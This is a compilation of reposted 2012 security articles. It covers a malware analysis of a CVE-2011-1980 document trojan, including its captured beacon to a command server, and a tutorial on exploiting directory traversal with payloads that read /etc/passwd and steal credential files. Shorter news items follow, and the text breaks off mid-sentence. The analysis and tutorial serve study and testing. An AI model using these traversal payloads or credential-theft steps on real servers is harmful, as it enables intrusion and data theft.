[/TR] [TR] [TD=class: tr-caption, align: center]ActiveX prompt.[/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] The picture below shows locations of the dropped file and the registry changes. SVCHOST.EXE process injection [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020 [/h] [h=3]fputlsat.dll (thumbs.db) strings[/h] [h=3]Unicode Strings: ---------------------------------------------------------------------------[/h] [h=3]Adobe Photoshop ---- ??? Adobe Photoshop 6.0 ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.[/h] [h=3]VS_VERSION_INFO StringFileInfo 040404b0 Comments CompanyName Microsoft Corporation FileDescription Microsoft Office FrontPage Client Utility Library FileVersion 11.0.5510.0 InternalName FP40CUTL LegalCopyright Copyright© Microsoft Corporation 2003. All rights reserved. LegalTrademarks OriginalFilename FP40CUTL PrivateBuild ProductName FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too. ProductVersion 11, 0, 0, 0 SpecialBuild VarFileInfo Translation[/h] [h=3]Created Files[/h] File: iede32.ocx Size: 13824 MD5: D4859FC951652B3C9657F8621D4DB625 Virustotal The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service List of strings // Created : 14.02.2012 08:00 // Type : Name List 10001000: SUB_L10001000 10001010: CASE_10001064_PROC0001 10001021: CASE_10001064_PROC0002 10001033: CASE_10001064_PROC0000 1000105A: L1000105A 10001064: CASE_PROCTABLE_10001064 10001080: ServiceMain 1000113A: L1000113A 1000113F: L1000113F 10001152: L10001152 1000115F: L1000115F 10001170: SUB_L10001170 100011C0: L100011C0 100011D1: CASE_10001248_PROC0000 100011E7: CASE_10001248_PROC0004 100011F5: L100011F5 100011F8: CASE_10001248_PROC0001 10001214: CASE_10001248_PROC0002 10001230: CASE_10001248_PROC0003 10001248: CASE_PROCTABLE_10001248 10001260: InstallService 100012A6: L100012A6 100012D8: L100012D8 1000132D: L1000132D 10001339: L10001339 1000135A: L1000135A 1000135F: L1000135F 10001374: L10001374 1000139A: L1000139A 100013DC: L100013DC 10001465: L10001465 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1000288C: L1000288C 100028EC: L100028EC 100028F2: L100028F2 100028F5: L100028F5 10002920: L10002920 10002936: L10002936 1000293C: jmp_MSVCRT.dll!__CxxFrameHandler 10002950: jmp_MSVCRT.dll!_CxxThrowException 10002956: jmp_MSVCRT.dll!_except_handler3 1000295C: jmp_MSVCRT.dll!??3@YAXPAX@Z 10002962: jmp_MSVCRT.dll!??2@YAPAXI@Z 10002970: SUB_L10002970 1000297C: L1000297C 10002990: L10002990 1000299F: SUB_L1000299F 100029B5: L100029B5 100029DD: L100029DD 100029E1: L100029E1 10002A07: L10002A07 10002A1E: L10002A1E 10002A2F: L10002A2F 10002A34: L10002A34 10002A44: L10002A44 10002A47: L10002A47 10002A4A: EntryPoint 10002A66: L10002A66 10002A70: L10002A70 10002A82: L10002A82 10002A8C: L10002A8C 10002A8E: L10002A8E 10002A92: L10002A92 10002AAE: L10002AAE 10002AB7: L10002AB7 10002AC6: L10002AC6 10002ADD: L10002ADD 10002AE0: L10002AE0 10002AE8: jmp_MSVCRT.dll!??1type_info@@UAE@XZ 10002AEE: jmp_MSVCRT.dll!_initterm 10002B00: L10002B00 10002B10: L10002B10 10002B1B: L10002B1B 10002B30: L10002B30 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KERNEL32.dll!GetProcAddress 10003070: KERNEL32.dll!FreeConsole 10003074: KERNEL32.dll!GetSystemDirectoryA 10003078: KERNEL32.dll!FreeLibrary 10003080: MSVCRT.dll!??3@YAXPAX@Z 10003084: MSVCRT.dll!??2@YAPAXI@Z 10003088: MSVCRT.dll!atoi 1000308C: MSVCRT.dll!fwrite 10003090: MSVCRT.dll!fclose 10003094: MSVCRT.dll!fopen 10003098: MSVCRT.dll!strstr 1000309C: MSVCRT.dll!sprintf 100030A0: MSVCRT.dll!_snprintf 100030A4: MSVCRT.dll!_strupr 100030A8: MSVCRT.dll!??1type_info@@UAE@XZ 100030AC: MSVCRT.dll!free 100030B0: MSVCRT.dll!_initterm 100030B4: MSVCRT.dll!malloc 100030B8: MSVCRT.dll!_adjust_fdiv 100030BC: MSVCRT.dll!_beginthreadex 100030C0: MSVCRT.dll!_except_handler3 100030C4: MSVCRT.dll!__CxxFrameHandler 100030C8: MSVCRT.dll!strchr 100030CC: MSVCRT.dll!strncat 100030D0: MSVCRT.dll!strncpy 100030D4: MSVCRT.dll!wcstombs 100030D8: MSVCRT.dll!_stricmp 100030DC: MSVCRT.dll!_CxxThrowException 100030E4: WININET.dll!HttpEndRequestA 100030E8: WININET.dll!HttpSendRequestA 100030EC: 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Type: REG_EXPAND_SZ Data: C:\WINDOWS\system32\iede32.ocx [h=3]Traffic[/h] In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name. POST /IElog/TestURL.asp HTTP/1.0 User-Agent: www Host: www.aviraco.com Content-Length: 10 Pragma: no-cache 1234567890HTTP/1.1 400 Bad Request Content-Type: text/html Date: Tue, 14 Feb 2012 05:39:57 GMT Connection: close Content-Length: 39 <h1>Bad Request (Invalid Hostname)</h1> Domain Name : aviraco.com PunnyCode : aviraco.com Creation Date : 2011-03-30 10:31:10 Updated Date : 2011-03-30 10:31:10 Expiration Date : 2012-03-30 10:31:10 Registrant: Organization : zhipengwang Name : zhipengwang Address : Zhongguancun Hailong Building, Room 1005 City : haidianqu Province/State : beijingshi Country : china Postal Code : 100083 Host reachable, 408 ms. average - Ethr.Net LLC 7960B Soquel Dr. #417 Aptos CA 95003 United States [TABLE] [TR] [TD]IP Address History Event Date Action Pre-Action IP Post-Action IP 2009-12-28 New -none- 2010-09-13 Change 2010-09-24 Change 2011-02-02 Change 2011-02-13 Not Resolvable -none- 2011-10-14 New -none- 2011-10-25 Change Registrar History Date Registrar 2009-12-26 Name.com aka DomainSite 2011-03-29 Xin Net Name Server History Event Date Action Pre-Action Server Post-Action Server 2009-12-28 New -none- Name.com 2011-02-08 Delete Name.com -none- 2011-03-31 New Xinnet.cn Xinnetdns.com 2011-12-13 Transfer Xinnetdns.com Xincache.com RR www.comedns.com. A www.creamofa.com. A[/TD] [TD][/TD] [/TR] [/TABLE] [h=3]Automated Scans[/h] Virustotal SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850 MD5: 275c5ac2067d17187a71b94ccfdc4608 File size: 21.5 KB ( 22016 bytes ) File name: report.doc File type: MS Word Document Detection ratio: 17 / 43 Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago ) Antivirus Result Update AhnLab-V3 Dropper/Ms11-073 20120213 AVG Exploit_c.UDK 20120213 ClamAV Exploit.Doc-2 20120214 Emsisoft Exploit.MSWord.CVE-2011!IK 20120214 eSafe - 20120213 eTrust-Vet - 20120213 Fortinet W97M/CVE_2011_1980.A!exploit 20120214 Ikarus Exploit.MSWord.CVE-2011 20120214 Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214 McAfee Exploit-CVE2011-1980 20120214 McAfee-GW-Edition - 20120213 Microsoft Exploit:Win32/Actjack.A 20120213 NOD32 W97M/Exploit.CVE-2011-1980.A 20120214 nProtect Trojan-Exploit/W32.Agent.22016 20120213 PCTools Trojan.Generic 20120207 Sophos Troj/Hijack-H 20120214 SUPERAntiSpyware - 20120206 Symantec Trojan.Activehijack 20120214 TrendMicro TROJ_ACTIVEHIJ.A 20120213 TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214 ViRobot Doc.S.MS11-073.22016 20120213 Virustotal SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128 MD5: 60068812b59e58d6338aaebd649f9020 File size: 124.0 KB ( 126976 bytes ) File name: fputlsat.dll File type: Win32 DLL Detection ratio: 28 / 43 Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago ) AhnLab-V3 Win-Trojan/Activehijack.126976 20120213 AntiVir TR/Drop.Kaliox.A 20120213 Avast Win32:Malware-gen 20120214 BitDefender Trojan.Generic.KD.529689 20120214 DrWeb Trojan.MulDrop3.34467 20120214 Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214 F-Secure Trojan.Generic.KD.529689 20120214 Fortinet W32/Agent.PRG!tr 20120214 GData Trojan.Generic.KD.529689 20120214 Ikarus Trojan-Dropper.Win32.Agent 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!60068812B59E 20120213 Microsoft TrojanDropper:Win32/Kaliox.A 20120213 NOD32 Win32/TrojanDropper.Agent.PRG 20120214 Norman W32/Agent.XGSO 20120213 nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213 PCTools Trojan.Dropper 20120207 Symantec Trojan.Dropper 20120214 TrendMicro TROJ_MULDROP.IC 20120213 TrendMicro-HouseCall TROJ_MULDROP.IC 20120214 VIPRE Trojan.Win32.Generic!BT 20120214 ViRobot Trojan.Win32.Activehijack.126976 20120213 VirusBuster Trojan.DR.Agent!ly6ZRARwo6A Virustotal SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793 SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32 MD5: d4859fc951652b3c9657f8621d4db625 File size: 13.5 KB ( 13824 bytes ) File name: iede32.ocx File type: Win32 DLL Detection ratio: 28 / 42 Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago ) 0 AhnLab-V3 Win-Trojan/Activehijack.13824 20120213 AntiVir TR/Spy.13824.71 20120214 Antiy-AVL Trojan/Win32.Genome.gen 20120213 BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214 DrWeb Trojan.Click2.13847 20120214 Emsisoft Trojan.Win32.Spy!IK 20120214 eSafe Win32.GenHeur.LP.Aq@ 20120213 F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Fortinet W32/Agent.OLJ 20120214 GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Ikarus Trojan.Win32.Spy 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan.Win32.Genome.aehtz 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!D4859FC95165 20120213 Microsoft TrojanDownloader:Win32/Kaliox.A 20120213 NOD32 Win32/Agent.OLJ 20120214 Norman W32/Troj_Generic.KIKX 20120213 nProtect Trojan/W32.Genome.13824.J 20120213 Sophos Troj/Spy-YL 20120214 Symantec Trojan.Gen.2 20120214 TheHacker Trojan/Agent.olj 20120213 TrendMicro BKDR_CONIP.A 20120214 TrendMicro-HouseCall BKDR_CONIP.A 20120214 ViRobot Trojan.Win32.Activehijack.13824 20120214 VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213 Sursa: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog
[h=3]Hunting & Exploiting Directory Traversal[/h][h=2]Friday, February 17, 2012[/h] In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do? Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in. Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like: [FONT="] [FONT="]somefunction.php?img=/some/place/graphic.jpg [/FONT] [/FONT] or [FONT="]somefunction.php?page=/view/something[/FONT] The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stop get. You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo: [FONT="]cookie: language=en-us;[/FONT] could turn into: [FONT="]File.Open('/' + language '/' + some-file);[/FONT] [FONT="] File.Open('/' + language + '.' + some-file); [/FONT] If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as: [FONT="]cookie: language=../../../../../etc/passwd[/FONT] [FONT="] cookie: language=../../../../../etc/passwd;[/FONT][FONT="] [/FONT] Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that. Now what? Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files. The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually. The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to-- the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like: [FONT="] [FONT="]/mainpage.asp[/FONT] [/FONT] [FONT="] /vulnerableFeature.asp?path=/images/some-image.jpg[/FONT] you'd test for: [FONT="] [FONT="]/vulnerableFeature.asp?path=../mainpage.asp[/FONT] [/FONT] [FONT="] /vulnerableFeature.asp?path=/mainpage.asp[/FONT] Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard coded credentials source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way. Some final things to consider: Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods. When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems. User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload). Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this. Image / gallery plugins for CMS's are notorious for directory traversal. Error messages are your friend here. If you get a system/application error instead of a file not found type error, you can at least use the mechanism to check for existence of files. Happy Hunting. -kuzushi * Thanks DC & AJ Posted by kuzushi at 2:01 PM Sursa: Carnal0wnage & Attack Research Blog: Hunting & Exploiting Directory Traversal
[h=1]Ubuntu 12.04 LTS Gets HUD Interface[/h]February 17th, 2012, 22:39 GMT · By Marius Nestor The HUD feature in Ubuntu 12.04 LTS With today's updates, the upcoming Ubuntu 12.04 LTS (Precise Pangolin) operating system received many new features and improvements, including the Privacy Settings, Video Lens for Unity and the HUD (Head-Up Display) system described in this article. Originally introduced by Mark Shuttleworth last month, the Head-Up Display, or HUD for short, is some sort of add-on for the Unity interface allowing users to interact with application's menus by pressing the ALT key. At the moment, HUD was introduced alongside the current menus placed on the Unity Panel, but in the end, the Head-Up Display system will entirely replace menus in Unity applications. However, this will most probably happen in Ubuntu 12.10. HUD was developed by Canonical in-house during the last 18 months, and believe it or not it is here to revolutionize the Linux desktop. Sursa: Ubuntu 12.04 LTS Gets HUD Interface - Softpedia
[h=1]Trend Micro Releases HijackThis Source Code to sourceforge.net[/h][h=2]Program's Creator Merijn Bellekom Endorses Open Source Move[/h] By Trend Micro Incorporated Published: Friday, Feb. 17, 2012 - 8:12 am CUPERTINO, Calif., Feb. 17, 2012 -- /PRNewswire/ -- Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, today announced the release of HijackThis as an open source application. HijackThis- HijackThis - Wikipedia, the free encyclopedia - scans your computer to find settings changed by spyware, malware or other unwanted programs. HijackThis also generates an in-depth report to enable expert users to analyze and fix an infected computer. Several security communities use HijackThis log files to help users evaluate and eradicate infections. A common practice for novice users is to generate a HijackThis log file and submit it to one of the many forums devoted to HijackThis on the web. Experts at these forums provide information on which items are causing your problems and how to remove them safely from your computer. The code, originally written in Visual Basic, is now officially available at HiJackThis | Free software downloads at SourceForge.net. "This means that other people can build on a solid base to create or improve their own anti-malware tools," said Merijn Bellekom, the original creator of HijackThis. Trend Micro has offered HijackThis as a free tool since acquiring the antispyware freeware tool from its Netherlands-based creator, Merijn Bellekom in 2007. By then, it had already been downloaded more than 10 million times and was often used to submit logs to online discussion and help forums, such as Castlecops.com, Majorgeeks.com and Spywareinfo.com, to elicit comments that could help in cleaning infected desktops "HijackThis was an essential tool at CastleCops, so much so that there were forums, web applications and services dedicated to it, answering questions posed from the data collected about files and registry entries. Hands down, HijackThis was vital to the health of a PC providing needed data that helped experts clean machines from complicated malware infections. Enabling the open source community with source code for the powerful tool HijackThis shows the commitment Trend Micro has toward advancing security and privacy. The OSS framework provides people with an opportunity to help others in a rich and diverse environment, and this ensures that HijackThis will continue building on its strength in serving the community," said Paul Laudanski, Founder, Castlecops.com Trend Micro will continue to maintain the original source code and will update the base code on SourceForge as developers make modifications that are essential and positive to the continued improvement of this code. As new malicious code is released faster than ever before, the need for analyzing log data to identify new malicious code is more important than ever. Through this offer to the open source community, the product has the opportunity to develop and become an even better solution to quickly identify new malicious code. "HijackThis moving to open source is a really exciting stage for this tool and a big thanks to Trend Micro for bringing this tool back to life. HijackThis was once the most used tool for enumerating Windows startup programs and quickly identifying the presence of malware. Moving HijackThis to open source will prompt more rapid releases and also allow more people to be involved in the project so that it is able to keep pace with current infection techniques," said Larry Abrams, Owner and Founder of BleepingComputer.com. About Trend Micro Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years' experience, we deliver top-ranked client, server and cloud-based security that fits our customers' and partners' needs, stops new threats faster, and protects data in physical, virtualized and cloud environments. Powered by the industry-leading Trend Micro Smart Protection Network cloud computing security infrastructure, our products and services stop threats where they emerge – from the Internet. They are supported by 1,000+ threat intelligence experts around the globe. Additional information about Trend Micro Incorporated and its products and services are available at Trend Micro.com. This Trend Micro news release and other announcements are available at http://NewsRoom.TrendMicro.com and as part of an RSS feed at www.trendmicro.com/rss. Or follow our news on Twitter at @TrendMicro. SOURCE Trend Micro Incorporated Sursa: Trend Micro Releases HijackThis Source Code to sourceforge.net - PR Newswire - sacbee.com
[h=1]Google Chrome update fixes high-severity vulnerabilities and patches Flash Player[/h]by Lucian Constantin, IDG News Service Feb 16, 2012 11:00 pm Google released a new version of its Chrome browser on Wednesday in order to update the bundled Flash Player plug-in and address serious security vulnerabilities. Google Chrome 17.0.963.56 fixes 12 security flaws, seven of which are considered high severity, four of medium severity and one of low severity. Security researcher Jüri Aedla received a special $1,337 reward for discovering and reporting an integer overflow vulnerability in libpng, the library used by Chrome to process PNG images. Other high-severity flaws were identified in the browser's PDF codecs, its subframe loading, h.264 parsing and path rendering components, as well as its MKV, database, column and counter node handling code. In theory these vulnerabilities should be considered critical because they could facilitate the remote execution of arbitrary code on the targeted systems. However, because Google Chrome has a sandboxed architecture, exploiting these vulnerabilities alone would not provide attackers with the necessary level of access to run malicious code. Six vulnerabilities patched in this release were discovered with the help of an open-source tool called AddressSanitizer, Google Chrome engineer Jason Kersey said in a blog post on Wednesday. Chrome 17.0.963.56 also includes a new Flash Player version that Adobe released on Wednesday, Kersey said. The Flash Player update addresses seven critical security flaws. Google paid a total of $6,837 to security researchers who reported vulnerabilities patched in this release. The company recently expanded its Chromium Security Rewards Program to also cover vulnerabilities found in Chrome OS. Sursa: Google Chrome update fixes high-severity vulnerabilities and patches Flash Player | Macworld
[h=3]Tales from the DNSCrypt: Linux Rising[/h]by David Ulevitch, Founder/CEO on Feb 16th, 2012 When we released the Mac-only preview of DNSCrypt, we knew it was a game changer. The revolutionary piece of lightweight software encrypts all DNS traffic between you and our servers. We also knew it was our responsibility to get this fundamental improvement to Internet security ready for the masses as quickly as possible. That’s why last week we announced that we’re searching for a rockstar win32 hacker to build a Windows release. But the blog post catalyzed a frenzy of responses from Linux users asking when a version would be available for them. The good news, is that the wait is over for Linux users. In fact, there was never a wait at all. We published the code for DNSCrypt on GitHub when we released the preview, so although there isn’t a user interface built just yet, Linux users can still experience the benefits of DNSCrypt in just a few steps. Here are simple step-by-step instructions for setting up DNSCrypt on your Linux machine: Download the right package for your Linux distribution: 64-bit DEB package (Debian, Ubuntu, other .deb-based distributions) 32-bit DEB package 64-bit RPM package (Openwall, CentOS, Fedora, other .rpm-based distributions) 32-bit RPM package [*]Install the package using your package manager [*]Open a terminal. Enter: sudo /usr/sbin/dnscrypt-proxy –daemonize [*]Set your DNS settings to Confirm you’re using OpenDNS here. Now that you’re using DNSCrypt, you can spread the word to other Linux users. We’d love to see your blog posts, videos and social media posts so don’t forget to tag @OpenDNS on Facebook and Twitter. If you want to help build a GUI to make this process even easier for Linux users, we’d be happy to work with you to get it right. If you’d like us to review your work, email us at dnscrypt at opendns dot com. Additional instructions and compilation instructions for other operating systems can be found here. Sursa: https://blog.opendns.com/2012/02/16/tales-from-the-dnscrypt-linux-rising/
[h=1]Google cookies 'bypassed Safari privacy protection'[/h] 17 February 2012 Last updated at 18:28 GMT Google has been accused of bypassing the privacy settings of users of the Safari web-browser. The Wall Street Journal said Google and other companies had worked around privacy settings designed to restrict cookies. Cookies are small text files stored by browsers which can record information about online activity, and help some online services work. However Google says the story "mischaracterises" what happened. Advertisers can use cookies to track online behaviour, helping them to target the commercials they show to internet users. Some think this use of cookies erodes online privacy. In May, European Union laws are due to come into force which will restrict the use of advertising cookies. But cookies are also essential to some web services like those Google offers. Cookie control The Safari browser is produced by Apple, and is the browser used by the iPhone. By default Safari only allows cookies to be stored by the web page a user is visiting, not from third parties such as advertisers. However, Stanford University researcher Jonathan Mayer found that advertisers were still able to store cookies on the computers of internet users browsing with Safari. It was his discovery that formed the basis of the Wall Street Journal's story. Many Google services use cookies, for example to remember when someone is signed in to a service, but they are also used by the firm to help personalise advertising. It was when Google attempted to find a way to enable some of its services and personalised advertising to work on Safari that, Google says, it inadvertently stored cookies. Side-stepping Safari In a statement, senior vice president Rachel Whetstone said that last year the company had decided to "enable features for signed-in Google users on Safari who had opted to see personalised ads and other content". Continue reading the main story [h=2]“Start Quote[/h] We are aware that some third parties are circumventing Safari's privacy features and we are working to put a stop to it” Apple spokesman She added: "To enable these features, we created a temporary communication link between Safari browsers and Google's servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalisation." Ms Whetsone said the company had created new systems to make sure the information it collected was *********, but this had led to unintended consequences: "The Safari browser contained functionality that then enabled other Google advertising cookies to be set on the browser. "We didn't anticipate that this would happen, and we have now started removing these advertising cookies from Safari browsers. It's important to stress that, just as on other browsers, these advertising cookies do not collect personal information." The Wall Street Journal reported that Google "disabled the code after being contacted by the paper". Google declined to provide further comment to the BBC. Privacy warning Online privacy advocates were highly critical of Google's actions. The Electronic Frontier Foundation wrote: "It's time for Google to acknowledge that it can do a better job of respecting the privacy of web users." Although much of the criticism has been directed at the search giant, the Wall Street Journal said that in addition to Google, a number of advertising companies had been using the work-around which had been known about for some time. An Apple spokesman said in a statement: "We are aware that some third parties are circumventing Safari's privacy features and we are working to put a stop to it." Sursa: Google Cookies Bypassed Safari Privacy Protection ? Packet Storm
[h=1]Computer spyware is newest weapon in Syrian conflict[/h] [TABLE] [TR] [TD] [/TD] [TD] By Ben Brumfield, CNN February 17, 2012 [/TD] [/TR] [/TABLE] Syrians demonstrate against the regime after Friday prayers in the north Syrian city of Idlib on February 17. Activists working against the regime now have to worry about malware that can expose their activities (CNN) -- In Syria's cyberwar, the regime's supporters have deployed a new weapon against opposition activists -- computer viruses that spy on them, according to an IT specialist from a Syrian opposition group and a former international aid worker whose computer was infected. A U.S.-based antivirus software maker, which analyzed one of the viruses at CNN's request, said that it was recently written for a specific cyberespionage campaign and that it passes information it robs from computers to a server at a government-owned telecommunications company in Syria. Supporters of dictator Bashar al-Assad first steal the identities of opposition activists, then impersonate them in online chats, said software engineer Dlshad Othman. They gain the trust of other users, pass out Trojan horse viruses and encourage people to open them. Once on the victim's computer, the malware sends information out to third parties. Inside Syria: Hope, supplies run low in bunker Othman is an IT security "go-to-guy" for opposition activists. He resides outside of Syria for his own safety. Since December, he has heard from dozens of opposition members who say their computers were infected. Two of them recently passed actual viruses to Othman and a colleague with whom he works. They checked them out. "We have two malwares -- first one is really complex," Othman said via Skype chat. "It can hide itself more." The U.S. analysis of one of the viruses -- the simpler one -- would appear to corroborate the time of its launch around the start of the year. The virus has two parts, said Vikram Thakur, principal security response manager at Symantec Corporation, known to consumers for its Norton antivirus software. He said one of them points to December 6 and the other to January 16. Thakur has dubbed the simpler virus "backdoor.breut." It was the more complex virus that the former aid worker unwittingly downloaded during a chat. Since she travels to Syria, she has requested that CNN not name her for security reasons and instead refer to her as "Susan." In one Syrian town, full-throated cries of defiance To get a picture of the humanitarian needs on the ground in Syria, "Susan" contacted opposition members via the Internet. In January, she received a call via Skype from someone she believed was a regime opponent. It was an imposter and a regime supporter, she claims. "They called me actually and pretended that it's him -- this activist that I didn't know, because I'd been talking to him only two times and only in writing." Days later, other opposition members told Susan and Othman that the activist she thought she had spoken with was in detention. Activists accuse government forces of coercing him to reveal his user name and identity and of then going online to impersonate him. Othman says additional activists, who say they were detained and released, tell of being forced to turn over their passwords to Syrian authorities. CNN cannot independently confirm the accusations, because the Syrian government strictly limits international media coverage within its borders. Calls for Syrian government comment to a spokeswoman for al-Assad on Friday were not answered or did not go through. Friday is the weekly special day of prayer in the Muslim world. The man chatting with Susan via Skype passed her a file. She recalled what he said to her to coax her to open it: "This makes sure that when you're talking to me, it's really me talking to you and not somebody else." New York Times reporter dies in Syria She clicked on the file. "It actually didn't do anything," she said in a baffled tone. "I didn't notice any change at all." No graphics launched; no pop-up opened to announce to the user that the virus was being downloaded. The link appeared to be dead or defected, said Othman. The second virus, backdoor.breut, which was e-mailed to him by an activist inside Syria for analysis, launched the same way. "Download, open, then nothing," Othman said. It contains a fake Facebook logo and was passed off in a chat room as a Facebook security update, he said. At CNN's request, Othman forwarded that virus to an IT security expert in California for an independent analysis. Othman removed the more complex malware on Susan's computer but made an image of the infected hard drive beforehand. At more than 250 GB, it would have to be sent on an external hard drive by regular post -- snail mail -- for any independent scrutiny. The U.S. expert confirmed the invisible nature of the backdoor.breut Trojan horse download. Thousand stage public protests on Friday "Nothing would actually show up," said Thakur. "The only thing that the Trojan actually does -- it copies itself into one of the temporary locations, but that would not be visible to the regular user." The malware launches when the user reboots the computer. The Syrian cyberactivist and the California IT security manager pointed out that the lack of fanfare during download helps to conceal the viruses from their victims. "Most of them will say 'it's a damaged file,' and they will forget about it," Othman said. Susan did just that. She was not aware she had been hacked until she lost her Facebook and e-mail accounts a few days after clicking on the file. "I didn't click on any kind of new link or something, so they must have known about the password," she said, referring to the loss of her Facebook account. She handed over her laptop to Othman and his colleague, who told her that the Trojan horse had logged her key strokes, taken screen shots, rummaged through her folders. It hid the IP address it sent its information to, Othman said. Othman found a screen shot the Trojan horse took of Susan's online banking home page. He told her to change all her passwords, Susan said. "You don't want your money to be stolen by some of the Syrian security guys," she quipped. The other virus -- backdoor.breut -- sends the information it pillages from infected computers to the IP address: and does not hide this. "We checked the IP address that our engineer referenced and can confirm that it belongs to the STE (Syrian Telecommunications Establishment)," a Symantec representative wrote to CNN. The STE is the government telecommunications company. This does not necessarily mean that someone at STE is doing the hacking, Thakur stresses. "Whether it's a home user behind that or it's actually a company or an organization, which has been allocated that IP address, we just have no insight from where we sit." But the Syrian government has access to all activity through that server "absolutely without any doubt," Thakur said. Anyone not wanting the government to see what they are up to would not use that server. Skilled Syrian opposition activists avoid government telecom servers when online. The simple virus, backdoor.breut, acts like a bull in a china shop, Symantec's Thakur said. "It did not look like it was written by any sophisticated hacker," he said after examining it. "It was just kind of put together -- slapstick functionality." Simple malware is readily available for download on underground forums in the Internet. Hackers can repurpose it and hand it out. Othman believed the second software to be such an off-the-shelf product because of its amateurish construction, but the California expert disagrees. "It's not something that somebody just went out there, copied code from an Internet website and just pasted it in. It was definitely coded for its current purpose." The name "backdoor.breut" derives from the virus' behavior. "We sort of took the word 'brute' just because of what it was actually doing and kind of changed a couple of characters to b-r-e-u-t," Thakur said. "Brute -- meaning that it is using brute force -- it's just going in smash-and-grab -- I'm going to try to get anything that I can and get the hell out of there." Backdoor.breut attempts to give the hacker remote control of the victim's computer, according to the analysis. It steals passwords and system information, downloads new programs, guides internal processes, logs keystrokes and takes shots with the webcam. It also turns off antivirus notification, but that does not completely conceal it from detection. "Some of the good software can detect it in the same day," Thakur said. The nature of its use may make backdoor.breut and other new Syrian malware hard to defend against. Antivirus makers need to know the virus to be able to assign it a signature and make the file detectible to block the download, according to Thakur. The more widely a new virus spreads around the world, the more likely it is to land on an antivirus maker's radar. The 